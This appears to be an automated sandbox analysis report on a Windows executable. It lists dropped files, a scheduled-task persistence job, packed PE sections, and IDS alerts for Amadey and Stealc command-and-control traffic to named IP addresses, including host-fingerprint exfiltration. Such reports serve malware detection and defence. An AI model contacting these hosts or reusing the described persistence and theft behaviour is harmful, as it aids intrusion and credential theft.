Preview:	{"schemaVersion":35,"addons":[{"id":"formautofill@mozilla.org","syncGUID":"{9f54712e-79e2-445b-974a-266a0185f206}","version":"1.0.1","type":"extension","loader":null,"updateURL":null,"installOrigins":null,"manifestVersion":2,"optionsURL":null,"optionsType":null,"optionsBrowserStyle":true,"aboutURL":null,"defaultLocale":{"name":"Form Autofill","creator":null,"developers":null,"translators":null,"contributors":null},"visible":true,"active":true,"userDisabled":false,"appDisabled":false,"embedderDisabled":false,"installDate":1695865283000,"updateDate":1695865283000,"applyBackgroundUpdates":1,"path":"C:\\Program Files\\Mozilla Firefox\\browser\\features\\formautofill@mozilla.org.xpi","skinnable":false,"sourceURI":null,"releaseNotesURI":null,"softDisabled":false,"foreignInstall":false,"strictCompatibility":true,"locales":[],"targetApplications":[{"id":"toolkit@mozilla.org","minVersion":null,"maxVersion":null}],"targetPlatforms":[],"signedDate":null,"seen":true,"dependencies":[],"incognito":"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1021904
Entropy (8bit):	6.648417932394748
Encrypted:	false
SSDEEP:	12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
MD5:	FE3355639648C417E8307C6D051E3E37
SHA1:	F54602D4B4778DA21BC97C7238FC66AA68C8EE34
SHA-256:	1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
SHA-512:	8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...\|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1021904
Entropy (8bit):	6.648417932394748
Encrypted:	false
SSDEEP:	12288:vYLdTfFKbNSjv92eFN+3wH+NYriA0Iq6lh6VawYIpAvwHN/Uf1h47HAfg1oet:vYLdTZ923NYrjwNpgwef1hzfg1x
MD5:	FE3355639648C417E8307C6D051E3E37
SHA1:	F54602D4B4778DA21BC97C7238FC66AA68C8EE34
SHA-256:	1ED7877024BE63A049DA98733FD282C16BD620530A4FB580DACEC3A78ACE914E
SHA-512:	8F4030BB2464B98ECCBEA6F06EB186D7216932702D94F6B84C56419E9CF65A18309711AB342D1513BF85AED402BC3535A70DB4395874828F0D35C278DD2EAC9C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......NH...)...)...)..eM...)..eM...)..eM..)..eM...)...)..i)..XA...)..XA..;)..XA...)...)..g)..cA...)..cA...)..Rich.)..........PE..d....z\.........." .....t................................................................`.........................................P...,...\|...(............P...H...z.................T...........................0...................p............................text...$s.......t.................. ..`.rdata...~...........x..............@..@.data....3..........................@....pdata...H...P...J..................@..@.rodata..............^..............@..@.reloc...............j..............@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.968220104601006
Encrypted:	false
SSDEEP:	3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
MD5:	3D33CDC0B3D281E67DD52E14435DD04F
SHA1:	4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
SHA-256:	F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
SHA-512:	A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
Malicious:	false
Preview:	Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.968220104601006
Encrypted:	false
SSDEEP:	3:C3OuN9RAM7VDXcEzq+rEakOvTMBv+FdBAIABv+FEn:0BDUmHlvAWeWEn
MD5:	3D33CDC0B3D281E67DD52E14435DD04F
SHA1:	4DB88689282FD4F9E9E6AB95FCBB23DF6E6485DB
SHA-256:	F526E9F98841D987606EFEAFF7F3E017BA9FD516C4BE83890C7F9A093EA4C47B
SHA-512:	A4A96743332CC8EF0F86BC2E6122618BFC75ED46781DADBAC9E580CD73DF89E74738638A2CCCB4CAA4CBBF393D771D7F2C73F825737CDB247362450A0D4A4BC1
Malicious:	false
Preview:	Name: gmpopenh264.Description: GMP Plugin for OpenH264..Version: 1.8.1.APIs: encode-video[h264], decode-video[h264].

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs-1.js

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	13205
Entropy (8bit):	5.477632876108893
Encrypted:	false
SSDEEP:	192:lEnSRkyYbBp6yqUCaXI6VyplNvj5RHNBw8dfnSl:XeVqUD8tnPww0
MD5:	35DE38569FE42E1B24F853B126498AF9
SHA1:	2D90192BC82219A8FDE287D5CD59EC5F414B624F
SHA-256:	55C97F3EAC274FCC693A99B1CCF0715C3FAC7DF07CF0C4EE7FFA29C81E544F5B
SHA-512:	9A4D8C1B9621C8BD9A80923D4E87ECCC742DA7834C6015DF1C69C21A74EF4A1C204D83E90371F5EEFA9C6D16C6C55405CBB9330ADB23826CAE7D7CBFC75B5768
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1725623927);..user_pref("app.update.lastUpdateTime.background-update-timer", 1725623927);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..u

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ASCII text, with very long lines (1769), with CRLF line terminators
Category:	dropped
Size (bytes):	13205
Entropy (8bit):	5.477632876108893
Encrypted:	false
SSDEEP:	192:lEnSRkyYbBp6yqUCaXI6VyplNvj5RHNBw8dfnSl:XeVqUD8tnPww0
MD5:	35DE38569FE42E1B24F853B126498AF9
SHA1:	2D90192BC82219A8FDE287D5CD59EC5F414B624F
SHA-256:	55C97F3EAC274FCC693A99B1CCF0715C3FAC7DF07CF0C4EE7FFA29C81E544F5B
SHA-512:	9A4D8C1B9621C8BD9A80923D4E87ECCC742DA7834C6015DF1C69C21A74EF4A1C204D83E90371F5EEFA9C6D16C6C55405CBB9330ADB23826CAE7D7CBFC75B5768
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.backgroundErrors", 2);..user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1725623927);..user_pref("app.update.lastUpdateTime.background-update-timer", 1725623927);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..u

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\recovery.jsonlz4 (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 5952 bytes
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	6.32996355081194
Encrypted:	false
SSDEEP:	24:vIKSUGu5kLZ8pSwcQELXHeU70sAu3UuT5spQU/wHVVPNZ0XJjhWyOcUCBoB5cU0u:wKpR5S8yQEzeU70+zBtZ0XJGadhY
MD5:	5450584C46C535D6EDB0CF6173F2FEFB
SHA1:	A820933E19E998831B3CCEECD7F3F0CFE638F6E1
SHA-256:	05DEC548503BE86347EF1F67536D4CAE78986BD08AC05E452646326B40210922
SHA-512:	E402550CABE5E38EC91C757F23F907BB9B27C7151BB43970DFBFDB3E2DE28625E554B3C712E000A4B9606EF02A7E9A277F8CE61879D45C23AA20B6B01ACEB6A0
Malicious:	false
Preview:	mozLz40.@.....{"version":["ses....restore",1],"windows":[{"tab..bentrie...!url":"https://accounts.google.com/ServiceLogin?s...=)...ettings&continue=J....v3/signin/challenge/pwd","title..p..cacheKey":0,"ID":6,"docshellUU...D"{27315c6c-393d-4410-94bd-8f0590098aa0}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":7,"persist":true}],"lastAccessed":1725623981658,"hiddey..searchMode...userContextId...attribut;..{},"index":1...questedI..p0,"imag....chrome://global/skin/icons/warning.svg"..aselect...,"_closedT..@],"_...C..`GroupC...":-1,"busy...t...Flags":21675417....width":1164,"height":891,"screenX":4...Y..Aizem..."maximize......BeforeMin...&..workspace:...4b3ac14b-43e5-4896-86e8-9e7d502ce1b5","zD..1...W...l...........:....1":{..jUpdate...9,"startTim..`893463...centCrash..B0},".....Dcook1. hoc..."addons.mozilla.org","valu...Abbc25ad08ccc1b2d785bc1812d8faa4d50f401055c8d3ce6d11bb3b0958223be","path":"/","na..a"taarI\|.Recure...,..Donly..fexp

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\recovery.jsonlz4.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	Mozilla lz4 compressed data, originally 5952 bytes
Category:	dropped
Size (bytes):	1590
Entropy (8bit):	6.32996355081194
Encrypted:	false
SSDEEP:	24:vIKSUGu5kLZ8pSwcQELXHeU70sAu3UuT5spQU/wHVVPNZ0XJjhWyOcUCBoB5cU0u:wKpR5S8yQEzeU70+zBtZ0XJGadhY
MD5:	5450584C46C535D6EDB0CF6173F2FEFB
SHA1:	A820933E19E998831B3CCEECD7F3F0CFE638F6E1
SHA-256:	05DEC548503BE86347EF1F67536D4CAE78986BD08AC05E452646326B40210922
SHA-512:	E402550CABE5E38EC91C757F23F907BB9B27C7151BB43970DFBFDB3E2DE28625E554B3C712E000A4B9606EF02A7E9A277F8CE61879D45C23AA20B6B01ACEB6A0
Malicious:	false
Preview:	mozLz40.@.....{"version":["ses....restore",1],"windows":[{"tab..bentrie...!url":"https://accounts.google.com/ServiceLogin?s...=)...ettings&continue=J....v3/signin/challenge/pwd","title..p..cacheKey":0,"ID":6,"docshellUU...D"{27315c6c-393d-4410-94bd-8f0590098aa0}","resultPrincipalURI":null,"hasUserInteract....false,"triggering9.p_base64{..\"3\":{}_..6docIdentifier":7,"persist":true}],"lastAccessed":1725623981658,"hiddey..searchMode...userContextId...attribut;..{},"index":1...questedI..p0,"imag....chrome://global/skin/icons/warning.svg"..aselect...,"_closedT..@],"_...C..`GroupC...":-1,"busy...t...Flags":21675417....width":1164,"height":891,"screenX":4...Y..Aizem..."maximize......BeforeMin...&..workspace:...4b3ac14b-43e5-4896-86e8-9e7d502ce1b5","zD..1...W...l...........:....1":{..jUpdate...9,"startTim..`893463...centCrash..B0},".....Dcook1. hoc..."addons.mozilla.org","valu...Abbc25ad08ccc1b2d785bc1812d8faa4d50f401055c8d3ce6d11bb3b0958223be","path":"/","na..a"taarI\|.Recure...,..Donly..fexp

C:\Windows\Tasks\svoutse.job

Download File

Process:	C:\Users\user\Desktop\pud8g3zixE.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.496727071611465
Encrypted:	false
SSDEEP:	6:d2pmTklrZX2JUEZ+lX1Qye6YctcVAkXIEZ8MlW8+y0lbB8t0:wmoJl2JQ12KkXd8kX+VN8t0
MD5:	BCA1AC11B6E439791D0284A207062E6E
SHA1:	DE7B4BA4A94549D9F13C690FF48555522505CE85
SHA-256:	91A8982CDD34D17438440E2FFEE3E8DF10DCD1E8A252FB4FA0E3624BDCA369D6
SHA-512:	A995B8F1BA15137FDAF3D6EEDC11C643DDA2E9F007A93F3A0FA0AA433BCF959847FDE7A64111724FB090389D625689C22B71EE7B1CAD8A404FCFE43D68F45223
Malicious:	false
Preview:	......s.)..G...C@.F.......<... .....s.......... ....................<.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.e.8.d.0.8.6.4.a.a.\.s.v.o.u.t.s.e...e.x.e.........F.R.O.N.T.D.E.S.K.-.P.C.\.f.r.o.n.t.d.e.s.k...................0.................:.@3P.........................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950717269798622
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	pud8g3zixE.exe
File size:	1'946'624 bytes
MD5:	57a1c647b3b2b8b56998e59efe21be64
SHA1:	bf90c9e7bf60d57d63e21870e601bf5e43d2676c
SHA256:	3a3c6e9a9b3cbf347aa90af44780a49330f54ac89c5ebf41676fadadb78ef918
SHA512:	64c0b64da3c3cfd9a4adde1dcfeae39874774850ca4043948b9232536f2f7f9fce754bd03dcb96f6da8f4e147cbb7f9a698de52f9caa6bf058bb079d7b0fe2f6
SSDEEP:	49152:YwAKlrlnSKHBEgPqfVZPCuHRD2khNlx0QN2PNg1:JdrlSKqgqfVZP5xD2kjTNcN
TLSH:	F99533AD1F8FD542F559C17B89042A0EABE830E35643B5A9A20C3E72F637A5DCC714A4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8d2000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66BF9EB2 [Fri Aug 16 18:47:14 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FD1647CC15Ah
setb byte ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 0000000Ah
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4d0a20	0x10	deetcwmf
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4d09d0	0x18	deetcwmf
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2dc00	c93a956a0eda2342883576ebd1dadf37	False	0.9993703039617486	data	7.9836096053865475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	a401b81d454bbe6adf384caa50b0c06d	False	0.578125	data	4.539074810757572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2bc000	0x200	07d5a59670e60b92842725a48a52ac07	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
deetcwmf	0x327000	0x1aa000	0x1a9c00	fc5ae3f6c515ab856b62bf2b15dd2515	False	0.9947828739724016	data	7.954684460410581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oqequikt	0x4d1000	0x1000	0x400	3463127124dfcde6bffb415a3adc1229	False	0.7431640625	data	5.9997446136705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4d2000	0x3000	0x2200	b9f493bcb881bb2e340ea7ded81a8845	False	0.05215992647058824	DOS executable (COM)	0.6012865093420019	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4d0a30	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-06T09:58:04.754232+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.7	49717	31.41.244.10	80	TCP
2024-09-06T09:58:05.776090+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49719	31.41.244.11	80	TCP
2024-09-06T09:58:08.043121+0200	2856122	ETPRO MALWARE Amadey CnC Response M1	1	31.41.244.10	80	192.168.2.7	49717	TCP
2024-09-06T09:58:08.750628+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49720	31.41.244.10	80	TCP
2024-09-06T09:58:09.448308+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.7	49721	31.41.244.11	80	TCP
2024-09-06T09:58:11.813496+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49722	31.41.244.10	80	TCP
2024-09-06T09:58:12.224839+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49723	185.215.113.100	80	TCP
2024-09-06T09:58:14.210326+0200	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.7	49727	31.41.244.10	80	TCP
2024-09-06T09:58:28.486890+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49791	185.215.113.100	80	TCP
2024-09-06T09:58:36.213716+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49801	185.215.113.100	80	TCP
2024-09-06T09:58:39.446468+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.7	49805	185.215.113.100	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 6, 2024 09:57:40.739955902 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 6, 2024 09:57:41.943205118 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 6, 2024 09:57:42.177568913 CEST	49674	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:42.180370092 CEST	49675	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:42.333847046 CEST	49672	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:44.349344015 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 6, 2024 09:57:48.365549088 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:57:48.740030050 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:57:49.161871910 CEST	49671	443	192.168.2.7	204.79.197.203
Sep 6, 2024 09:57:49.489983082 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:57:50.784497023 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:50.784524918 CEST	443	49699	4.231.128.59	192.168.2.7
Sep 6, 2024 09:57:50.784588099 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:50.786369085 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:50.786382914 CEST	443	49699	4.231.128.59	192.168.2.7
Sep 6, 2024 09:57:50.978698969 CEST	49677	443	192.168.2.7	20.50.201.200
Sep 6, 2024 09:57:51.592027903 CEST	443	49699	4.231.128.59	192.168.2.7
Sep 6, 2024 09:57:51.592199087 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:51.618113041 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:51.618136883 CEST	443	49699	4.231.128.59	192.168.2.7
Sep 6, 2024 09:57:51.618495941 CEST	443	49699	4.231.128.59	192.168.2.7
Sep 6, 2024 09:57:51.661948919 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:51.786881924 CEST	49674	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:51.786998034 CEST	49675	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:51.943454027 CEST	49672	443	192.168.2.7	104.98.116.138
Sep 6, 2024 09:57:52.343744040 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:52.343832970 CEST	443	49699	4.231.128.59	192.168.2.7
Sep 6, 2024 09:57:52.343883038 CEST	49699	443	192.168.2.7	4.231.128.59
Sep 6, 2024 09:57:52.676342010 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:52.676383018 CEST	443	49702	20.190.160.22	192.168.2.7
Sep 6, 2024 09:57:52.676465988 CEST	49702	443	192.168.2.7	20.190.160.22
Sep 6, 2024 09:57:52.677850962 CEST	49702	443	192.168.2.7	20.190.160.22
